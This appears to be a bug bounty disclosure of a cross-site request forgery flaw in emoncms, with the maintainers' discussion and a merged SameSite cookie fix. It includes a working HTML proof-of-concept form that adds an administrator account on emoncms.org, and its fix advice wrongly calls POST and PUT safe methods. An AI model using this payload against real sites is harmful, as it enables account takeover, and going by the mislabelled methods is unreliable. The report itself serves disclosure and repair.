Cross-Site Request Forgery (CSRF) in emoncms/emoncms

Valid

Reported on

Jul 22nd 2021


✍️ Description

When you don't set the SameSite attribute of cookies the browsers have special act in front of this issue.(I mean set default value on it) chrome and chromium based browsers set the attribute "Lax" that mean if you do add/delete/alter operation in a get HTTP request then your site more vulnerable with CSRF attacks.

But Firefox ( one of big ones ) don't set this attribute to "Lax" and set it to "none" that makes all POST and GET requests more Vulnerable to CSRF attack.

In Firefox I can add any Administer in Administer multiple accounts part of profile section With CSRF that users already allowed manually do it.

🕵️‍♂️ Proof of Concept

// PoC.html

<html>
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://emoncms.org/billing/account-add.json" method="POST">
      <input type="hidden" name="username" value="newuesr" />
      <input type="hidden" name="password" value="newpassword" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


💥 Impact

This vulnerability is capable of add any administrator in Firefox.

Fix

You should set SameSite attribute to Lax and only use safe HTTP methods like POST and PUT for writing data on your good website.

We have contacted a member of the emoncms team and are waiting to hear back 4 months ago
emoncms/emoncms maintainer validated this vulnerability 4 months ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
emoncms/emoncms maintainer
4 months ago

Thanks @amammad, im reading up on this now, could I set SameSite to strict? I cant think of any reason that cross site cookie based auth should be allowed? or am I missing something?

amammad
4 months ago

Researcher


Hi dear , I suggest this kind of Fix because of your application's future that maybe you want to add some capabilities to your application, I haven't any more reasons.

emoncms/emoncms maintainer
4 months ago

Here's my fix so far: https://github.com/emoncms/emoncms/pull/1716/files

emoncms/emoncms maintainer
4 months ago

Ok thanks, perhaps I will try Strict for now then, will this fix all of the CSRF vulnerabilities that you flagged up? or at least improve substantially?

amammad
4 months ago

Researcher


excuse me for delay I have headage last day until now. yes if you set Strict flag no one can use your cookie with any attack scenario .

emoncms/emoncms maintainer confirmed that a fix has been merged on ca1f5c 4 months ago
The fix bounty has been dropped